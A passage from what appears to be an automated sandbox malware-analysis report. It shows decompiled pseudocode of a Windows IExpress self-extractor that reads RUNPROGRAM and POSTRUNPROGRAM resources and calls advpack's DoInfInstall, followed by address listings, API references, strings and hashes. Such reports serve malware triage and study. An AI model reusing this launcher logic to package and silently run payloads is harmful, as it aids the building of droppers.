                                                                                                                                                                                                                                            													LocalFree(_t151);
                                                                                                                                                                                                                                            													goto L62;
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            												L58:
                                                                                                                                                                                                                                            												LocalFree(_t151);
                                                                                                                                                                                                                                            												_t127 = _t127 + 1;
                                                                                                                                                                                                                                            												_v396 = _t127;
                                                                                                                                                                                                                                            												__eflags = _t127 - 2;
                                                                                                                                                                                                                                            												if(_t127 >= 2) {
                                                                                                                                                                                                                                            													_t155 = 1;
                                                                                                                                                                                                                                            													__eflags = 1;
                                                                                                                                                                                                                                            													L69:
                                                                                                                                                                                                                                            													__eflags =  *0x8d8580;
                                                                                                                                                                                                                                            													if( *0x8d8580 != 0) {
                                                                                                                                                                                                                                            														E008D2267();
                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                            													_t77 = _t155;
                                                                                                                                                                                                                                            													goto L63;
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            												_t153 = _v392;
                                                                                                                                                                                                                                            												_t149 = _v388;
                                                                                                                                                                                                                                            												continue;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											L38:
                                                                                                                                                                                                                                            											__eflags =  *0x8d8180;
                                                                                                                                                                                                                                            											if( *0x8d8180 == 0) {
                                                                                                                                                                                                                                            												_t146 = 0x4c7;
                                                                                                                                                                                                                                            												E008D44B9(0, 0x4c7, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            												LocalFree(_v424);
                                                                                                                                                                                                                                            												 *0x8d9124 = 0x8007042b;
                                                                                                                                                                                                                                            												goto L62;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											__eflags = _t157;
                                                                                                                                                                                                                                            											if(_t157 == 0) {
                                                                                                                                                                                                                                            												goto L57;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											__eflags =  *0x8d9a34 & 0x00000004;
                                                                                                                                                                                                                                            											if(__eflags == 0) {
                                                                                                                                                                                                                                            												goto L57;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											_t129 = E008D6495(_t127, _t132, _t157, __eflags);
                                                                                                                                                                                                                                            											__eflags = _t129;
                                                                                                                                                                                                                                            											if(_t129 == 0) {
                                                                                                                                                                                                                                            												_t146 = 0x4c8;
                                                                                                                                                                                                                                            												E008D44B9(0, 0x4c8, "advpack.dll", 0, 0x10, 0);
                                                                                                                                                                                                                                            												L65:
                                                                                                                                                                                                                                            												LocalFree(_v408);
                                                                                                                                                                                                                                            												 *0x8d9124 = E008D6285();
                                                                                                                                                                                                                                            												goto L62;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											_t146 = GetProcAddress(_t129, "DoInfInstall");
                                                                                                                                                                                                                                            											_v404 = _t146;
                                                                                                                                                                                                                                            											__eflags = _t146;
                                                                                                                                                                                                                                            											if(_t146 == 0) {
                                                                                                                                                                                                                                            												_t146 = 0x4c9;
                                                                                                                                                                                                                                            												__eflags = 0;
                                                                                                                                                                                                                                            												E008D44B9(0, 0x4c9, "DoInfInstall", 0, 0x10, 0);
                                                                                                                                                                                                                                            												FreeLibrary(_t129);
                                                                                                                                                                                                                                            												goto L65;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											__eflags =  *0x8d8a30;
                                                                                                                                                                                                                                            											_t151 = _v408;
                                                                                                                                                                                                                                            											_v384 = 0;
                                                                                                                                                                                                                                            											_v368 =  &_v280;
                                                                                                                                                                                                                                            											_t96 =  *0x8d9a40; // 0x3
                                                                                                                                                                                                                                            											_v364 = _t96;
                                                                                                                                                                                                                                            											_t97 =  *0x8d8a38 & 0x0000ffff;
                                                                                                                                                                                                                                            											_v380 = 0x8d9154;
                                                                                                                                                                                                                                            											_v376 = _t151;
                                                                                                                                                                                                                                            											_v372 = 0x8d91e4;
                                                                                                                                                                                                                                            											_v360 = _t97;
                                                                                                                                                                                                                                            											if( *0x8d8a30 != 0) {
                                                                                                                                                                                                                                            												_t97 = _t97 | 0x00010000;
                                                                                                                                                                                                                                            												__eflags = _t97;
                                                                                                                                                                                                                                            												_v360 = _t97;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											_t144 =  *0x8d9a34; // 0x1
                                                                                                                                                                                                                                            											__eflags = _t144 & 0x00000008;
                                                                                                                                                                                                                                            											if((_t144 & 0x00000008) != 0) {
                                                                                                                                                                                                                                            												_t97 = _t97 | 0x00020000;
                                                                                                                                                                                                                                            												__eflags = _t97;
                                                                                                                                                                                                                                            												_v360 = _t97;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											__eflags = _t144 & 0x00000010;
                                                                                                                                                                                                                                            											if((_t144 & 0x00000010) != 0) {
                                                                                                                                                                                                                                            												_t97 = _t97 | 0x00040000;
                                                                                                                                                                                                                                            												__eflags = _t97;
                                                                                                                                                                                                                                            												_v360 = _t97;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											_t145 =  *0x8d8d48; // 0x0
                                                                                                                                                                                                                                            											__eflags = _t145 & 0x00000040;
                                                                                                                                                                                                                                            											if((_t145 & 0x00000040) != 0) {
                                                                                                                                                                                                                                            												_t97 = _t97 | 0x00080000;
                                                                                                                                                                                                                                            												__eflags = _t97;
                                                                                                                                                                                                                                            												_v360 = _t97;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											__eflags = _t145;
                                                                                                                                                                                                                                            											if(_t145 < 0) {
                                                                                                                                                                                                                                            												_t104 = _t97 | 0x00100000;
                                                                                                                                                                                                                                            												__eflags = _t104;
                                                                                                                                                                                                                                            												_v360 = _t104;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											_t98 =  *0x8d9a38; // 0x0
                                                                                                                                                                                                                                            											_v356 = _t98;
                                                                                                                                                                                                                                            											_t130 = _t146;
                                                                                                                                                                                                                                            											 *0x8da288( &_v384);
                                                                                                                                                                                                                                            											_t101 = _v404();
                                                                                                                                                                                                                                            											__eflags = _t164 - _t164;
                                                                                                                                                                                                                                            											if(_t164 != _t164) {
                                                                                                                                                                                                                                            												_t130 = 4;
                                                                                                                                                                                                                                            												asm("int 0x29");
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											 *0x8d9124 = _t101;
                                                                                                                                                                                                                                            											_push(_t129);
                                                                                                                                                                                                                                            											__eflags = _t101;
                                                                                                                                                                                                                                            											if(_t101 < 0) {
                                                                                                                                                                                                                                            												FreeLibrary();
                                                                                                                                                                                                                                            												goto L61;
                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                            												FreeLibrary();
                                                                                                                                                                                                                                            												_t127 = _v400;
                                                                                                                                                                                                                                            												goto L58;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										__eflags =  *0x8d9a40 - 1; // 0x3
                                                                                                                                                                                                                                            										if(__eflags == 0) {
                                                                                                                                                                                                                                            											goto L37;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										__eflags =  *0x8d8a20;
                                                                                                                                                                                                                                            										if( *0x8d8a20 == 0) {
                                                                                                                                                                                                                                            											goto L37;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										__eflags = _t157;
                                                                                                                                                                                                                                            										if(_t157 != 0) {
                                                                                                                                                                                                                                            											goto L38;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										_v388 = 1;
                                                                                                                                                                                                                                            										E008D202A(_t146); // executed
                                                                                                                                                                                                                                            										goto L37;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									_t146 =  &_v280;
                                                                                                                                                                                                                                            									_t108 = E008D468F("POSTRUNPROGRAM",  &_v280, 0x104);
                                                                                                                                                                                                                                            									__eflags = _t108;
                                                                                                                                                                                                                                            									if(_t108 == 0) {
                                                                                                                                                                                                                                            										goto L25;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									__eflags =  *0x8d8c42;
                                                                                                                                                                                                                                            									if( *0x8d8c42 != 0) {
                                                                                                                                                                                                                                            										goto L69;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									_t112 = CompareStringA(0x7f, 1,  &_v280, 0xffffffff, "<None>", 0xffffffff);
                                                                                                                                                                                                                                            									__eflags = _t112 == 0;
                                                                                                                                                                                                                                            									if(_t112 == 0) {
                                                                                                                                                                                                                                            										goto L69;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									goto L31;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								_t118 =  *0x8d8a38; // 0x0
                                                                                                                                                                                                                                            								if(_t118 == 0) {
                                                                                                                                                                                                                                            									L23:
                                                                                                                                                                                                                                            									if(_t153 != 0) {
                                                                                                                                                                                                                                            										goto L31;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									_t146 =  &_v276;
                                                                                                                                                                                                                                            									if(E008D468F("RUNPROGRAM",  &_v276, 0x104) != 0) {
                                                                                                                                                                                                                                            										goto L27;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									goto L25;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								if((_t118 & 0x00000001) == 0) {
                                                                                                                                                                                                                                            									__eflags = _t118 & 0x00000002;
                                                                                                                                                                                                                                            									if((_t118 & 0x00000002) == 0) {
                                                                                                                                                                                                                                            										goto L62;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									_t140 = "USRQCMD";
                                                                                                                                                                                                                                            									L20:
                                                                                                                                                                                                                                            									_t146 =  &_v276;
                                                                                                                                                                                                                                            									if(E008D468F(_t140,  &_v276, 0x104) == 0) {
                                                                                                                                                                                                                                            										goto L25;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									if(CompareStringA(0x7f, 1,  &_v276, 0xffffffff, "<None>", 0xffffffff) - 2 != 0xfffffffe) {
                                                                                                                                                                                                                                            										_t153 = 1;
                                                                                                                                                                                                                                            										_v388 = 1;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									goto L23;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								_t140 = "ADMQCMD";
                                                                                                                                                                                                                                            								goto L20;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						L26:
                                                                                                                                                                                                                                            						_push(_t130);
                                                                                                                                                                                                                                            						_t146 = 0x104;
                                                                                                                                                                                                                                            						E008D1781( &_v276, 0x104, _t130, 0x8d8c42);
                                                                                                                                                                                                                                            						goto L27;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t130 = "REBOOT";
                                                                                                                                                                                                                                            				_t125 = E008D468F(_t130, 0x8d9a2c, 4);
                                                                                                                                                                                                                                            				if(_t125 == 0 || _t125 > 4) {
                                                                                                                                                                                                                                            					goto L25;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					goto L3;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}





























































                                                                                                                                                                                                                                            0x008d3baa
                                                                                                                                                                                                                                            0x008d3bb0
                                                                                                                                                                                                                                            0x008d3bb7
                                                                                                                                                                                                                                            0x008d3bc0
                                                                                                                                                                                                                                            0x008d3bc2
                                                                                                                                                                                                                                            0x008d3bc9
                                                                                                                                                                                                                                            0x008d3bcb
                                                                                                                                                                                                                                            0x008d3bcf
                                                                                                                                                                                                                                            0x008d3bd3
                                                                                                                                                                                                                                            0x008d3bd9
                                                                                                                                                                                                                                            0x008d3bfd
                                                                                                                                                                                                                                            0x008d3bfd
                                                                                                                                                                                                                                            0x008d3bff
                                                                                                                                                                                                                                            0x008d3c03
                                                                                                                                                                                                                                            0x008d3c03
                                                                                                                                                                                                                                            0x008d3c11
                                                                                                                                                                                                                                            0x008d3c16
                                                                                                                                                                                                                                            0x008d3c19
                                                                                                                                                                                                                                            0x008d3c28
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d3c30
                                                                                                                                                                                                                                            0x008d3c39
                                                                                                                                                                                                                                            0x008d3c40
                                                                                                                                                                                                                                            0x008d3d13
                                                                                                                                                                                                                                            0x008d3d15
                                                                                                                                                                                                                                            0x008d3d21
                                                                                                                                                                                                                                            0x008d3d26
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d3c4f
                                                                                                                                                                                                                                            0x008d3c56
                                                                                                                                                                                                                                            0x008d3c60
                                                                                                                                                                                                                                            0x008d3c65
                                                                                                                                                                                                                                            0x008d3c77
                                                                                                                                                                                                                                            0x008d3c78
                                                                                                                                                                                                                                            0x008d3c7c
                                                                                                                                                                                                                                            0x008d3c7e
                                                                                                                                                                                                                                            0x008d3c82
                                                                                                                                                                                                                                            0x008d3c82
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d3c7c
                                                                                                                                                                                                                                            0x008d3c67
                                                                                                                                                                                                                                            0x008d3c69
                                                                                                                                                                                                                                            0x008d3c6d
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d3c58
                                                                                                                                                                                                                                            0x008d3c58
                                                                                                                                                                                                                                            0x008d3c6e
                                                                                                                                                                                                                                            0x008d3c6e
                                                                                                                                                                                                                                            0x008d3c87
                                                                                                                                                                                                                                            0x008d3c89
                                                                                                                                                                                                                                            0x008d3d4d
                                                                                                                                                                                                                                            0x008d3d4f
                                                                                                                                                                                                                                            0x008d3d50
                                                                                                                                                                                                                                            0x008d3d52
                                                                                                                                                                                                                                            0x008d3d9e
                                                                                                                                                                                                                                            0x008d3da8
                                                                                                                                                                                                                                            0x008d3daf
                                                                                                                                                                                                                                            0x008d3db4
                                                                                                                                                                                                                                            0x008d3db6
                                                                                                                                                                                                                                            0x008d3f4d
                                                                                                                                                                                                                                            0x008d3f4d
                                                                                                                                                                                                                                            0x008d3f4f
                                                                                                                                                                                                                                            0x008d3f56
                                                                                                                                                                                                                                            0x008d3f57
                                                                                                                                                                                                                                            0x008d3f58
                                                                                                                                                                                                                                            0x008d3f63
                                                                                                                                                                                                                                            0x008d3f63
                                                                                                                                                                                                                                            0x008d3dbc
                                                                                                                                                                                                                                            0x008d3dc0
                                                                                                                                                                                                                                            0x008d3dc2
                                                                                                                                                                                                                                            0x008d3de6
                                                                                                                                                                                                                                            0x008d3de6
                                                                                                                                                                                                                                            0x008d3de8
                                                                                                                                                                                                                                            0x008d3f0b
                                                                                                                                                                                                                                            0x008d3f0b
                                                                                                                                                                                                                                            0x008d3f0f
                                                                                                                                                                                                                                            0x008d3f13
                                                                                                                                                                                                                                            0x008d3f15
                                                                                                                                                                                                                                            0x008d3f1a
                                                                                                                                                                                                                                            0x008d3f1c
                                                                                                                                                                                                                                            0x008d3f46
                                                                                                                                                                                                                                            0x008d3f47
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d3f47
                                                                                                                                                                                                                                            0x008d3f1e
                                                                                                                                                                                                                                            0x008d3f1f
                                                                                                                                                                                                                                            0x008d3f25
                                                                                                                                                                                                                                            0x008d3f26
                                                                                                                                                                                                                                            0x008d3f2a
                                                                                                                                                                                                                                            0x008d3f2d
                                                                                                                                                                                                                                            0x008d3fd9
                                                                                                                                                                                                                                            0x008d3fd9
                                                                                                                                                                                                                                            0x008d3fda
                                                                                                                                                                                                                                            0x008d3fda
                                                                                                                                                                                                                                            0x008d3fe1
                                                                                                                                                                                                                                            0x008d3fe3
                                                                                                                                                                                                                                            0x008d3fe3
                                                                                                                                                                                                                                            0x008d3fe8
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d3fe8
                                                                                                                                                                                                                                            0x008d3f33
                                                                                                                                                                                                                                            0x008d3f37
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d3f37
                                                                                                                                                                                                                                            0x008d3dee
                                                                                                                                                                                                                                            0x008d3dee
                                                                                                                                                                                                                                            0x008d3df5
                                                                                                                                                                                                                                            0x008d3fad
                                                                                                                                                                                                                                            0x008d3fb9
                                                                                                                                                                                                                                            0x008d3fc2
                                                                                                                                                                                                                                            0x008d3fc8
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d3fc8
                                                                                                                                                                                                                                            0x008d3dfb
                                                                                                                                                                                                                                            0x008d3dfd
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d3e03
                                                                                                                                                                                                                                            0x008d3e0a
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d3e15
                                                                                                                                                                                                                                            0x008d3e17
                                                                                                                                                                                                                                            0x008d3e19
                                                                                                                                                                                                                                            0x008d3f94
                                                                                                                                                                                                                                            0x008d3fa4
                                                                                                                                                                                                                                            0x008d3f7c
                                                                                                                                                                                                                                            0x008d3f80
                                                                                                                                                                                                                                            0x008d3f8b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d3f8b
                                                                                                                                                                                                                                            0x008d3e2c
                                                                                                                                                                                                                                            0x008d3e30
                                                                                                                                                                                                                                            0x008d3e34
                                                                                                                                                                                                                                            0x008d3e36
                                                                                                                                                                                                                                            0x008d3f69
                                                                                                                                                                                                                                            0x008d3f6e
                                                                                                                                                                                                                                            0x008d3f70
                                                                                                                                                                                                                                            0x008d3f76
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d3f76
                                                                                                                                                                                                                                            0x008d3e3c
                                                                                                                                                                                                                                            0x008d3e43
                                                                                                                                                                                                                                            0x008d3e47
                                                                                                                                                                                                                                            0x008d3e52
                                                                                                                                                                                                                                            0x008d3e56
                                                                                                                                                                                                                                            0x008d3e5c
                                                                                                                                                                                                                                            0x008d3e61
                                                                                                                                                                                                                                            0x008d3e68
                                                                                                                                                                                                                                            0x008d3e70
                                                                                                                                                                                                                                            0x008d3e74
                                                                                                                                                                                                                                            0x008d3e7c
                                                                                                                                                                                                                                            0x008d3e80
                                                                                                                                                                                                                                            0x008d3e82
                                                                                                                                                                                                                                            0x008d3e82
                                                                                                                                                                                                                                            0x008d3e87
                                                                                                                                                                                                                                            0x008d3e87
                                                                                                                                                                                                                                            0x008d3e8b
                                                                                                                                                                                                                                            0x008d3e91
                                                                                                                                                                                                                                            0x008d3e94
                                                                                                                                                                                                                                            0x008d3e96
                                                                                                                                                                                                                                            0x008d3e96
                                                                                                                                                                                                                                            0x008d3e9b
                                                                                                                                                                                                                                            0x008d3e9b
                                                                                                                                                                                                                                            0x008d3e9f
                                                                                                                                                                                                                                            0x008d3ea2
                                                                                                                                                                                                                                            0x008d3ea4
                                                                                                                                                                                                                                            0x008d3ea4
                                                                                                                                                                                                                                            0x008d3ea9
                                                                                                                                                                                                                                            0x008d3ea9
                                                                                                                                                                                                                                            0x008d3ead
                                                                                                                                                                                                                                            0x008d3eb3
                                                                                                                                                                                                                                            0x008d3eb6
                                                                                                                                                                                                                                            0x008d3eb8
                                                                                                                                                                                                                                            0x008d3eb8
                                                                                                                                                                                                                                            0x008d3ebd
                                                                                                                                                                                                                                            0x008d3ebd
                                                                                                                                                                                                                                            0x008d3ec1
                                                                                                                                                                                                                                            0x008d3ec3
                                                                                                                                                                                                                                            0x008d3ec5
                                                                                                                                                                                                                                            0x008d3ec5
                                                                                                                                                                                                                                            0x008d3eca
                                                                                                                                                                                                                                            0x008d3eca
                                                                                                                                                                                                                                            0x008d3ece
                                                                                                                                                                                                                                            0x008d3ed5
                                                                                                                                                                                                                                            0x008d3ed9
                                                                                                                                                                                                                                            0x008d3ee0
                                                                                                                                                                                                                                            0x008d3ee6
                                                                                                                                                                                                                                            0x008d3eea
                                                                                                                                                                                                                                            0x008d3eec
                                                                                                                                                                                                                                            0x008d3eee
                                                                                                                                                                                                                                            0x008d3ef3
                                                                                                                                                                                                                                            0x008d3ef3
                                                                                                                                                                                                                                            0x008d3ef5
                                                                                                                                                                                                                                            0x008d3efa
                                                                                                                                                                                                                                            0x008d3efb
                                                                                                                                                                                                                                            0x008d3efd
                                                                                                                                                                                                                                            0x008d3f40
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d3eff
                                                                                                                                                                                                                                            0x008d3eff
                                                                                                                                                                                                                                            0x008d3f05
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d3f05
                                                                                                                                                                                                                                            0x008d3efd
                                                                                                                                                                                                                                            0x008d3dc7
                                                                                                                                                                                                                                            0x008d3dce
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d3dd0
                                                                                                                                                                                                                                            0x008d3dd7
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d3dd9
                                                                                                                                                                                                                                            0x008d3ddb
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d3ddd
                                                                                                                                                                                                                                            0x008d3de1
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d3de1
                                                                                                                                                                                                                                            0x008d3d59
                                                                                                                                                                                                                                            0x008d3d65
                                                                                                                                                                                                                                            0x008d3d6a
                                                                                                                                                                                                                                            0x008d3d6c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d3d6e
                                                                                                                                                                                                                                            0x008d3d75
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d3d8f
                                                                                                                                                                                                                                            0x008d3d96
                                                                                                                                                                                                                                            0x008d3d98
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d3d98
                                                                                                                                                                                                                                            0x008d3c8f
                                                                                                                                                                                                                                            0x008d3c98
                                                                                                                                                                                                                                            0x008d3cf1
                                                                                                                                                                                                                                            0x008d3cf3
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d3cfe
                                                                                                                                                                                                                                            0x008d3d11
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d3d11
                                                                                                                                                                                                                                            0x008d3c9c
                                                                                                                                                                                                                                            0x008d3ca5
                                                                                                                                                                                                                                            0x008d3ca7
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d3cad
                                                                                                                                                                                                                                            0x008d3cb2
                                                                                                                                                                                                                                            0x008d3cb7
                                                                                                                                                                                                                                            0x008d3cc5
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d3ce8
                                                                                                                                                                                                                                            0x008d3cec
                                                                                                                                                                                                                                            0x008d3ced
                                                                                                                                                                                                                                            0x008d3ced
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d3ce8
                                                                                                                                                                                                                                            0x008d3c9e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d3c9e
                                                                                                                                                                                                                                            0x008d3c56
                                                                                                                                                                                                                                            0x008d3d35
                                                                                                                                                                                                                                            0x008d3d35
                                                                                                                                                                                                                                            0x008d3d3c
                                                                                                                                                                                                                                            0x008d3d48
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d3d48
                                                                                                                                                                                                                                            0x008d3c03
                                                                                                                                                                                                                                            0x008d3be2
                                                                                                                                                                                                                                            0x008d3be7
                                                                                                                                                                                                                                            0x008d3bee
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 008D3C11
                                                                                                                                                                                                                                            • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,00000004), ref: 008D3CDC
                                                                                                                                                                                                                                              • Part of subcall function 008D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 008D46A0
                                                                                                                                                                                                                                              • Part of subcall function 008D468F: SizeofResource.KERNEL32(00000000,00000000,?,008D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008D46A9
                                                                                                                                                                                                                                              • Part of subcall function 008D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 008D46C3
                                                                                                                                                                                                                                              • Part of subcall function 008D468F: LoadResource.KERNEL32(00000000,00000000,?,008D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008D46CC
                                                                                                                                                                                                                                              • Part of subcall function 008D468F: LockResource.KERNEL32(00000000,?,008D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008D46D3
                                                                                                                                                                                                                                              • Part of subcall function 008D468F: memcpy_s.MSVCRT ref: 008D46E5
                                                                                                                                                                                                                                              • Part of subcall function 008D468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 008D46EF
                                                                                                                                                                                                                                            • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,?,008D8C42), ref: 008D3D8F
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 008D3E26
                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,008D8C42), ref: 008D3EFF
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(?,?,?,?,008D8C42), ref: 008D3F1F
                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,008D8C42), ref: 008D3F40
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(?,?,?,?,008D8C42), ref: 008D3F47
                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,DoInfInstall,00000000,00000010,00000000,?,008D8C42), ref: 008D3F76
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(?,advpack.dll,00000000,00000010,00000000,?,?,?,008D8C42), ref: 008D3F80
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(?,00000000,00000000,00000010,00000000,?,?,?,008D8C42), ref: 008D3FC2
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Free$Resource$Local$Library$CompareFindString$AddressLoadLockProcSizeofmemcpy_smemset
                                                                                                                                                                                                                                            • String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$D$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll$lenta
                                                                                                                                                                                                                                            • API String ID: 1032054927-3356413666
                                                                                                                                                                                                                                            • Opcode ID: 6de25c1b5acbe3cd9eca1ab1bb8296ce9f555df3a331a4daa81d8a76c6dd27fd
                                                                                                                                                                                                                                            • Instruction ID: 188b1e80781d1cda9b9b76354fd2b173f85379cf119a7a216ea2802d0404019d
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6de25c1b5acbe3cd9eca1ab1bb8296ce9f555df3a331a4daa81d8a76c6dd27fd
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 06B1CC70A093159BD720DF689845B6A77E5FB84710F100B2BFA95E63A0EB74CE44CB93
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
